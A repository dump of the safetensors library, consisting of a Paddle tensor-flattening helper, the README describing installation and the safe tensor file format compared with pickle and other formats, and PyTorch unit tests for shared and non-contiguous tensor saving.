trying to save a non contiguous tensor: `{name}` which is not allowed. It either means you" 244 | " are trying to save tensors which are reference of each other in which case it's recommended to save" 245 | " only the full tensors, and reslice at load time, or simply call `.contiguous()` on your tensor to" 246 | " pack it before saving." 247 | ) 248 | if not tensor.place.is_cpu_place(): 249 | # Moving tensor to cpu before saving 250 | tensor = tensor.cpu() 251 | 252 | import ctypes 253 | 254 | # When shape is empty (scalar), np.prod returns a float 255 | # we need a int for the following calculations 256 | length = int(np.prod(tensor.shape).item()) 257 | bytes_per_item = _SIZE[tensor.dtype] 258 | 259 | total_bytes = length * bytes_per_item 260 | 261 | ptr = tensor.data_ptr() 262 | if ptr == 0: 263 | return np.empty( 264 | 0 265 | ), 0 # XXX: bogus value we don't really care if we return a tensor here 266 | newptr = ctypes.cast(ptr, ctypes.POINTER(ctypes.c_ubyte)) 267 | data = np.ctypeslib.as_array(newptr, (total_bytes,)) # no internal copy 268 | if sys.byteorder == "big": 269 | npdtype = NPDTYPES[tensor.dtype] 270 | # Not in place as that would potentially modify a live running model 271 | data = data.view(npdtype).byteswap(inplace=False) 272 | return data, tensor 273 | 274 | 275 | def _flatten( 276 | tensors: Dict[str, paddle.Tensor], keep_alive_buffer: List 277 | ) -> Dict[str, Dict[str, Any]]: 278 | if not isinstance(tensors, dict): 279 | raise ValueError( 280 | f"Expected a dict of [str, paddle.Tensor] but received {type(tensors)}" 281 | ) 282 | 283 | for k, v in tensors.items(): 284 | if not isinstance(v, paddle.Tensor): 285 | raise ValueError( 286 | f"Key `{k}` is invalid, expected paddle.Tensor but received {type(v)}" 287 | ) 288 | 289 | flattened = {} 290 | for k, v in tensors.items(): 291 | arr, tensor_ref = _to_ndarray(v, k) 292 | keep_alive_buffer.append((arr, tensor_ref)) 293 | flattened[k] = { 294 | "dtype": str(v.dtype).split(".")[-1], 295 | "shape": v.shape, 296 | "data_ptr": arr.ctypes.data, 297 | "data_len": arr.nbytes, 298 | } 299 | return flattened 300 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | [Hugging Face Safetensors Library logo: an HTML <picture>/<img> block whose tags were stripped in this dump] 9 | 
10 | 11 | Python 12 | [![Pypi](https://img.shields.io/pypi/v/safetensors.svg)](https://pypi.org/pypi/safetensors/) 13 | [![Documentation](https://img.shields.io/website/http/huggingface.co/docs/safetensors/index.svg?label=docs)](https://huggingface.co/docs/safetensors/index) 14 | [![Codecov](https://codecov.io/github/huggingface/safetensors/coverage.svg?branch=main)](https://codecov.io/gh/huggingface/safetensors) 15 | [![Downloads](https://static.pepy.tech/badge/safetensors/month)](https://pepy.tech/project/safetensors) 16 | 17 | Rust 18 | [![Crates.io](https://img.shields.io/crates/v/safetensors.svg)](https://crates.io/crates/safetensors) 19 | [![Documentation](https://docs.rs/safetensors/badge.svg)](https://docs.rs/safetensors/) 20 | [![Codecov](https://codecov.io/github/huggingface/safetensors/coverage.svg?branch=main)](https://codecov.io/gh/huggingface/safetensors) 21 | [![Dependency status](https://deps.rs/repo/github/huggingface/safetensors/status.svg?path=safetensors)](https://deps.rs/repo/github/huggingface/safetensors?path=safetensors) 22 | 23 | # safetensors 24 | 25 | ## Safetensors 26 | 27 | This repository implements a new simple format for storing tensors 28 | safely (as opposed to pickle) and that is still fast (zero-copy). 29 | 30 | ### Installation 31 | #### Pip 32 | 33 | You can install safetensors via the pip manager: 34 | 35 | ```bash 36 | pip install safetensors 37 | ``` 38 | 39 | #### From source 40 | 41 | For the sources, you need Rust 42 | 43 | ```bash 44 | # Install Rust 45 | curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh 46 | # Make sure it's up to date and using stable channel 47 | rustup update 48 | git clone https://github.com/huggingface/safetensors 49 | cd safetensors/bindings/python 50 | pip install setuptools_rust 51 | pip install -e . 52 | ``` 53 | 54 | ### Getting started 55 | 56 | ```python 57 | import torch 58 | from safetensors import safe_open 59 | from safetensors.torch import save_file 60 | 61 | tensors = { 62 | "weight1": torch.zeros((1024, 1024)), 63 | "weight2": torch.zeros((1024, 1024)) 64 | } 65 | save_file(tensors, "model.safetensors") 66 | 67 | tensors = {} 68 | with safe_open("model.safetensors", framework="pt", device="cpu") as f: 69 | for key in f.keys(): 70 | tensors[key] = f.get_tensor(key) 71 | ``` 72 | 73 | [Python documentation](https://huggingface.co/docs/safetensors/index) 74 | 75 | 76 | ### Format 77 | 78 | - 8 bytes: `N`, an unsigned little-endian 64-bit integer, containing the size of the header 79 | - N bytes: a JSON UTF-8 string representing the header. 80 | - The header data MUST begin with a `{` character (0x7B). 81 | - The header data MAY be trailing padded with whitespace (0x20). 82 | - The header is a dict like `{"TENSOR_NAME": {"dtype": "F16", "shape": [1, 16, 256], "data_offsets": [BEGIN, END]}, "NEXT_TENSOR_NAME": {...}, ...}`, 83 | - `data_offsets` point to the tensor data relative to the beginning of the byte buffer (i.e. not an absolute position in the file), 84 | with `BEGIN` as the starting offset and `END` as the one-past offset (so total tensor byte size = `END - BEGIN`). 85 | - A special key `__metadata__` is allowed to contain free form string-to-string map. Arbitrary JSON is not allowed, all values must be strings. 86 | - Rest of the file: byte-buffer. 87 | 88 | Notes: 89 | - Duplicate keys are disallowed. Not all parsers may respect this. 90 | - In general the subset of JSON is implicitly decided by `serde_json` for 91 | this library. 
Anything obscure might be modified at a later time, such as odd ways 92 | to represent integers, newlines and escapes in UTF-8 strings. This would only 93 | be done for safety concerns. 94 | - Tensor values are not validated; in particular, NaN and +/-Inf could 95 | be present in the file. 96 | - Empty tensors (tensors with one dimension being 0) are allowed. 97 | They do not store any data in the data buffer, yet retain an entry in the header. 98 | They don't bring much value but are accepted since they are valid tensors 99 | from the perspective of traditional tensor libraries (torch, tensorflow, numpy, ..). 100 | - 0-rank tensors (tensors with shape `[]`) are allowed; they are merely scalars. 101 | - The byte buffer needs to be entirely indexed, and cannot contain holes. This prevents 102 | the creation of polyglot files. 103 | - Endianness: Little-endian. 104 | 105 | - Order: 'C' or row-major. 106 | - Notes: Some dtypes smaller than 1 byte have appeared, which makes alignment tricky. Non-traditional APIs might be required for those. 107 | 108 | 109 | ### Yet another format? 110 | 111 | The main rationale for this crate is to remove the need to use 112 | `pickle`, which `PyTorch` uses by default. 113 | There are other formats out there used by machine learning, as well as more general 114 | formats. 115 | 116 | 117 | Let's take a look at the alternatives and why this format is deemed interesting. 118 | This is my very personal and probably biased view: 119 | 120 | | Format | Safe | Zero-copy | Lazy loading | No file size limit | Layout control | Flexibility | Bfloat16/Fp8 | 121 | | ----------------------- | --- | --- | --- | --- | --- | --- | --- | 122 | | pickle (PyTorch) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 | 123 | | H5 (Tensorflow) | 🗸 | ✗ | 🗸 | 🗸 | ~ | ~ | ✗ | 124 | | SavedModel (Tensorflow) | 🗸 | ✗ | ✗ | 🗸 | 🗸 | ✗ | 🗸 | 125 | | MsgPack (flax) | 🗸 | 🗸 | ✗ | 🗸 | ✗ | ✗ | 🗸 | 126 | | Protobuf (ONNX) | 🗸 | ✗ | ✗ | ✗ | ✗ | ✗ | 🗸 | 127 | | Cap'n'Proto | 🗸 | 🗸 | ~ | 🗸 | 🗸 | ~ | ✗ | 128 | | Arrow | ? | ? | ? | ? | ? | ? | ✗ | 129 | | Numpy (npy,npz) | 🗸 | ? | ? | ✗ | 🗸 | ✗ | ✗ | 130 | | pdparams (Paddle) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 | 131 | | SafeTensors | 🗸 | 🗸 | 🗸 | 🗸 | 🗸 | ✗ | 🗸 | 132 | 133 | - Safe: Can I use a file randomly downloaded and expect not to run arbitrary code? 134 | - Zero-copy: Does reading the file require more memory than the original file? 135 | - Lazy loading: Can I inspect the file without loading everything? And load only 136 | some tensors in it without scanning the whole file (distributed setting)? 137 | - Layout control: Lazy loading is not necessarily enough, since if the information about tensors is spread out in your file, then even if the information is lazily accessible you might have to access most of your file to read the available tensors (incurring many DISK -> RAM copies). Controlling the layout to keep fast access to single tensors is important. 138 | - No file size limit: Is there a limit to the file size? 139 | - Flexibility: Can I save custom code in the format and be able to use it later with zero extra code? (~ means we can store more than pure tensors, but no custom code) 140 | - Bfloat16/Fp8: Does the format support native bfloat16/fp8 (meaning no weird workarounds are 141 | necessary)? This is becoming increasingly important in the ML world. 142 | 143 | 144 | ### Main oppositions 145 | 146 | - Pickle: Unsafe, runs arbitrary code. 147 | - H5: Apparently now discouraged for TF/Keras. Seems like a great fit otherwise, actually. 
Some classic use-after-free issues: . On a very different level than pickle security-wise. Also 210k lines of code vs ~400 lines for this lib currently. 148 | - SavedModel: Tensorflow-specific (it contains TF graph information). 149 | - MsgPack: No layout control to enable lazy loading (important for loading specific parts in a distributed setting). 150 | - Protobuf: Hard 2GB max file size limit. 151 | - Cap'n'Proto: Float16 support is not present [link](https://capnproto.org/language.html#built-in-types) so using a manual wrapper over a byte-buffer would be necessary. Layout control seems possible but not trivial as buffers have limitations [link](https://stackoverflow.com/questions/48458839/capnproto-maximum-filesize). 152 | - Numpy (npz): No `bfloat16` support. Vulnerable to zip bombs (DOS). Not zero-copy. 153 | - Arrow: No `bfloat16` support. 154 | 155 | ### Notes 156 | 157 | - Zero-copy: No format is really zero-copy in ML; the data needs to go from disk to RAM/GPU RAM (and that takes time). On CPU, if the file is already in the OS cache, then it can 158 | truly be zero-copy, whereas on GPU there is no such disk cache, so a copy is always required, 159 | but you can bypass allocating all the tensors on CPU at any given point. 160 | SafeTensors is not zero-copy for the header. The choice of JSON is pretty arbitrary, but since deserializing the header takes far less time than loading the actual tensor data, and JSON is human-readable, I went that way (the header is also far smaller than the tensor data). 161 | 162 | - Endianness: Little-endian. This can be modified later, but it feels really unnecessary at the 163 | moment. 164 | - Order: 'C' or row-major. This seems to have won. We can add that information later if needed. 165 | - Stride: No striding; all tensors need to be packed before being serialized. I have yet to see a case where it seems useful to have a strided tensor stored in serialized format. 166 | - Sub-1-byte dtypes: Dtypes can now be smaller than 1 byte, which makes alignment and addressing tricky. For now, the library will simply error out whenever an operation triggers a non-aligned read. A trickier API may be created later for those non-standard ops. 167 | 168 | ### Benefits 169 | 170 | Since we can invent a new format, we can propose additional benefits: 171 | 172 | - Prevent DOS attacks: We can craft the format in such a way that it's almost 173 | impossible to use malicious files to DOS-attack a user. Currently, there's a limit 174 | on the size of the header of 100MB to prevent parsing extremely large JSON. 175 | Also, when reading the file, there's a guarantee that addresses in the file 176 | do not overlap in any way, meaning that when you're loading a file you should never 177 | exceed the size of the file in memory. 178 | 179 | - Faster load: PyTorch seems to be the fastest format to load among the major 180 | ML formats. However, it does seem to have an extra copy on CPU, which we 181 | can bypass in this lib by using `torch.UntypedStorage.from_file`. 182 | Currently, CPU loading times are extremely fast with this lib compared to pickle. 183 | GPU loading times are as fast as or faster than the PyTorch equivalent. 184 | Loading first on CPU with memmapping with torch, and then moving all tensors to GPU, seems 185 | to be faster too somehow (similar behavior in torch pickle). 186 | 187 | - Lazy loading: in distributed (multi-node or multi-GPU) settings, it's nice to be able to 188 | load only part of the tensors of the various models. 
For 189 | [BLOOM](https://huggingface.co/bigscience/bloom) using this format enabled 190 | to load the model on 8 GPUs from 10mn with regular PyTorch weights down to 45s. 191 | This really speeds up feedbacks loops when developing on the model. For instance 192 | you don't have to have separate copies of the weights when changing the distribution 193 | strategy (for instance Pipeline Parallelism vs Tensor Parallelism). 194 | 195 | License: Apache-2.0 196 | -------------------------------------------------------------------------------- /bindings/python/tests/test_pt_model.py: -------------------------------------------------------------------------------- 1 | import copy 2 | import unittest 3 | 4 | import torch 5 | 6 | from safetensors import safe_open 7 | from safetensors.torch import ( 8 | _end_ptr, 9 | _find_shared_tensors, 10 | _is_complete, 11 | _remove_duplicate_names, 12 | load_model, 13 | save_file, 14 | save_model, 15 | ) 16 | 17 | 18 | class OnesModel(torch.nn.Module): 19 | def __init__(self): 20 | super().__init__() 21 | self.a = torch.nn.Linear(4, 4) 22 | self.a.weight = torch.nn.Parameter(torch.ones((4, 4))) 23 | self.a.bias = torch.nn.Parameter(torch.ones((4,))) 24 | self.b = self.a 25 | 26 | 27 | class Model(torch.nn.Module): 28 | def __init__(self): 29 | super().__init__() 30 | self.a = torch.nn.Linear(100, 100) 31 | self.b = self.a 32 | 33 | 34 | class NonContiguousModel(torch.nn.Module): 35 | def __init__(self): 36 | super().__init__() 37 | self.a = torch.nn.Linear(100, 100) 38 | A = torch.zeros((100, 100)) 39 | A = A.transpose(0, 1) 40 | self.a.weight = torch.nn.Parameter(A) 41 | 42 | 43 | class CopyModel(torch.nn.Module): 44 | def __init__(self): 45 | super().__init__() 46 | self.a = torch.nn.Linear(100, 100) 47 | self.b = copy.deepcopy(self.a) 48 | 49 | 50 | class NoSharedModel(torch.nn.Module): 51 | def __init__(self): 52 | super().__init__() 53 | self.a = torch.nn.Linear(100, 100) 54 | self.b = torch.nn.Linear(100, 100) 55 | 56 | 57 | class TorchModelTestCase(unittest.TestCase): 58 | def test_is_complete(self): 59 | A = torch.zeros((3, 3)) 60 | self.assertTrue(_is_complete(A)) 61 | 62 | B = A[:1, :] 63 | self.assertFalse(_is_complete(B)) 64 | 65 | # Covers the whole storage but with holes 66 | C = A[::2, :] 67 | self.assertFalse(_is_complete(C)) 68 | 69 | D = torch.zeros((2, 2), device=torch.device("meta")) 70 | self.assertTrue(_is_complete(D)) 71 | 72 | def test_find_shared_tensors(self): 73 | A = torch.zeros((3, 3)) 74 | B = A[:1, :] 75 | 76 | self.assertEqual(_find_shared_tensors({"A": A, "B": B}), [{"A", "B"}]) 77 | self.assertEqual(_find_shared_tensors({"A": A}), [{"A"}]) 78 | self.assertEqual(_find_shared_tensors({"B": B}), [{"B"}]) 79 | 80 | C = torch.zeros((2, 2), device=torch.device("meta")) 81 | D = C[:1] 82 | # Meta device is not shared 83 | self.assertEqual(_find_shared_tensors({"C": C, "D": D}), []) 84 | self.assertEqual(_find_shared_tensors({"C": C}), []) 85 | self.assertEqual(_find_shared_tensors({"D": D}), []) 86 | 87 | def test_find_shared_non_shared_tensors(self): 88 | A = torch.zeros((4,)) 89 | B = A[:2] 90 | C = A[2:] 91 | # Shared storage but do not overlap 92 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B"}, {"C"}]) 93 | 94 | B = A[:2] 95 | C = A[1:] 96 | # Shared storage but *do* overlap 97 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B", "C"}]) 98 | 99 | B = A[:2] 100 | C = A[2:] 101 | D = A[:1] 102 | # Shared storage but *do* overlap 103 | self.assertEqual( 104 | _find_shared_tensors({"B": B, "C": C, "D": 
D}), [{"B", "D"}, {"C"}] 105 | ) 106 | 107 | def test_end_ptr(self): 108 | A = torch.zeros((4,)) 109 | start = A.data_ptr() 110 | end = _end_ptr(A) 111 | self.assertEqual(end - start, 16) 112 | B = torch.zeros((16,)) 113 | A = B[::4] 114 | start = A.data_ptr() 115 | end = _end_ptr(A) 116 | # Jump 3 times 16 byes (the stride of B) 117 | # Then add the size of the datapoint 4 bytes 118 | self.assertEqual(end - start, 16 * 3 + 4) 119 | 120 | # FLOAT16 121 | A = torch.zeros((4,), dtype=torch.float16) 122 | start = A.data_ptr() 123 | end = _end_ptr(A) 124 | self.assertEqual(end - start, 8) 125 | B = torch.zeros((16,), dtype=torch.float16) 126 | A = B[::4] 127 | start = A.data_ptr() 128 | end = _end_ptr(A) 129 | # Jump 3 times 8 bytes (the stride of B) 130 | # Then add the size of the datapoint 4 bytes 131 | self.assertEqual(end - start, 8 * 3 + 2) 132 | 133 | def test_remove_duplicate_names(self): 134 | A = torch.zeros((3, 3)) 135 | B = A[:1, :] 136 | 137 | self.assertEqual(_remove_duplicate_names({"A": A, "B": B}), {"A": ["B"]}) 138 | self.assertEqual( 139 | _remove_duplicate_names({"A": A, "B": B, "C": A}), {"A": ["B", "C"]} 140 | ) 141 | with self.assertRaises(RuntimeError): 142 | self.assertEqual(_remove_duplicate_names({"B": B}), []) 143 | 144 | def test_failure(self): 145 | model = Model() 146 | with self.assertRaises(RuntimeError): 147 | save_file(model.state_dict(), "tmp.safetensors") 148 | 149 | # def test_workaround_refuse(self): 150 | # model = Model() 151 | # A = torch.zeros((1000, 10)) 152 | # a = A[:100, :] 153 | # model.a.weight = torch.nn.Parameter(a) 154 | # with self.assertRaises(RuntimeError) as ctx: 155 | # save_model(model, "tmp4.safetensors") 156 | # self.assertIn(".Refusing to save/load the model since you could be storing much more memory than needed.", str(ctx.exception)) 157 | 158 | def test_save(self): 159 | # Just testing the actual saved file to make sure we're ok on big endian 160 | model = OnesModel() 161 | save_model(model, "tmp_ones.safetensors") 162 | with safe_open("tmp_ones.safetensors", framework="pt") as f: 163 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"}) 164 | 165 | # 192 hardcoded to skip the header, metadata order is random. 
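        # (Layout note: per the format described in the README, the file begins with an
        #  8-byte little-endian header length N followed by N bytes of JSON header, so
        #  skipping 192 bytes here implies N == 184 for this particular file.)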
166 | self.assertEqual( 167 | open("tmp_ones.safetensors", "rb").read()[192:], 168 | b"""\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?""", 169 | ) 170 | 171 | model2 = OnesModel() 172 | load_model(model2, "tmp_ones.safetensors") 173 | 174 | state_dict = model.state_dict() 175 | for k, v in model2.state_dict().items(): 176 | torch.testing.assert_close(v, state_dict[k]) 177 | 178 | def test_workaround(self): 179 | model = Model() 180 | save_model(model, "tmp.safetensors") 181 | with safe_open("tmp.safetensors", framework="pt") as f: 182 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"}) 183 | 184 | model2 = Model() 185 | load_model(model2, "tmp.safetensors") 186 | 187 | state_dict = model.state_dict() 188 | for k, v in model2.state_dict().items(): 189 | torch.testing.assert_close(v, state_dict[k]) 190 | 191 | def test_workaround_works_with_different_on_file_names(self): 192 | model = Model() 193 | state_dict = model.state_dict() 194 | state_dict.pop("a.weight") 195 | state_dict.pop("a.bias") 196 | save_file(state_dict, "tmp.safetensors") 197 | 198 | model2 = Model() 199 | load_model(model2, "tmp.safetensors") 200 | 201 | state_dict = model.state_dict() 202 | for k, v in model2.state_dict().items(): 203 | torch.testing.assert_close(v, state_dict[k]) 204 | 205 | def test_workaround_non_contiguous(self): 206 | model = NonContiguousModel() 207 | 208 | with self.assertRaises(ValueError) as ctx: 209 | save_model(model, "tmp_c.safetensors", force_contiguous=False) 210 | self.assertIn("use save_model(..., force_contiguous=True)", str(ctx.exception)) 211 | save_model(model, "tmp_c.safetensors", force_contiguous=True) 212 | 213 | model2 = NonContiguousModel() 214 | load_model(model2, "tmp_c.safetensors") 215 | 216 | state_dict = model.state_dict() 217 | for k, v in model2.state_dict().items(): 218 | torch.testing.assert_close(v, state_dict[k]) 219 | 220 | def test_workaround_copy(self): 221 | model = CopyModel() 222 | self.assertEqual( 223 | _find_shared_tensors(model.state_dict()), 224 | [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}], 225 | ) 226 | save_model(model, "tmp.safetensors") 227 | 228 | model2 = CopyModel() 229 | load_model(model2, "tmp.safetensors") 230 | 231 | state_dict = model.state_dict() 232 | for k, v in model2.state_dict().items(): 233 | torch.testing.assert_close(v, state_dict[k]) 234 | 235 | def test_difference_with_torch(self): 236 | model = Model() 237 | torch.save(model.state_dict(), "tmp2.bin") 238 | 239 | model2 = NoSharedModel() 240 | # This passes on torch. 241 | # The tensors are shared on disk, they are *not* shared within the model 242 | # The model happily loads the tensors, and ends up *not* sharing the tensors by. 
243 | # doing copies 244 | self.assertEqual( 245 | _find_shared_tensors(model2.state_dict()), 246 | [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}], 247 | ) 248 | model2.load_state_dict(torch.load("tmp2.bin")) 249 | self.assertEqual( 250 | _find_shared_tensors(model2.state_dict()), 251 | [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}], 252 | ) 253 | 254 | # However safetensors cannot save those, so we cannot 255 | # reload the saved file with the different model 256 | save_model(model, "tmp2.safetensors") 257 | with self.assertRaises(RuntimeError) as ctx: 258 | load_model(model2, "tmp2.safetensors") 259 | self.assertIn( 260 | """Missing key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception) 261 | ) 262 | 263 | def test_difference_torch_odd(self): 264 | model = NoSharedModel() 265 | a = model.a.weight 266 | b = model.b.weight 267 | self.assertNotEqual(a.data_ptr(), b.data_ptr()) 268 | torch.save(model.state_dict(), "tmp3.bin") 269 | 270 | model2 = Model() 271 | self.assertEqual( 272 | _find_shared_tensors(model2.state_dict()), 273 | [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}], 274 | ) 275 | # Torch will affect either `b` or `a` to the shared tensor in the `model2` 276 | model2.load_state_dict(torch.load("tmp3.bin")) 277 | 278 | # XXX: model2 uses only the B weight not the A weight anymore. 279 | self.assertFalse(torch.allclose(model2.a.weight, model.a.weight)) 280 | torch.testing.assert_close(model2.a.weight, model.b.weight) 281 | self.assertEqual( 282 | _find_shared_tensors(model2.state_dict()), 283 | [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}], 284 | ) 285 | 286 | # Everything is saved as-is 287 | save_model(model, "tmp3.safetensors") 288 | # safetensors will yell that there were 2 tensors on disk, while 289 | # the models expects only 1 tensor since both are shared. 290 | with self.assertRaises(RuntimeError) as ctx: 291 | load_model(model2, "tmp3.safetensors") 292 | # Safetensors properly warns the user that some ke 293 | self.assertIn( 294 | """Unexpected key(s) in state_dict: "b.bias", "b.weight""", 295 | str(ctx.exception), 296 | ) 297 | --------------------------------------------------------------------------------